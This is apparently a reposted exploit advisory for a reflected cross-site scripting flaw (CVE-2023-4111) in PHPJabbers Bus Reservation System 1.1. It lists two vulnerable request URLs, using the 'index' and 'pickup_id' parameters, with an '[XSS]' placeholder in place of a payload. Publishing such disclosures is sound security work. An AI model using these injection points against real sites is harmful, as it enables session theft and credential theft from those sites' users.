Share
## https://sploitus.com/exploit?id=PACKETSTORM:173927
# Exploit Title: PHPJabbers Bus Reservation System 1.1 - Reflected XSS  
# Exploit Author: CraCkEr  
# Date: 20/07/2023  
# Vendor: PHPJabbers  
# Vendor Homepage: https://www.phpjabbers.com/  
# Software Link: https://www.phpjabbers.com/bus-reservation-system/  
# Tested on: Windows 10 Pro  
# Impact: Manipulate the content of the site  
# CVE: CVE-2023-4111  
  
  
## Description  
  
The attacker can send to victim a link containing a malicious URL in an email or instant message  
can perform a wide variety of actions, such as stealing the victim's session token or login credentials  
  
  
  
Path: /index.php  
  
GET parameter 'index' is vulnerable to RXSS  
  
https://website/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&hide=0&index=[XSS]&session_id=  
  
Path: /index.php  
  
GET parameter 'pickup_id' is vulnerable to RXSS  
  
https://website/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=[XSS]&session_id=  
  
  
[-] Done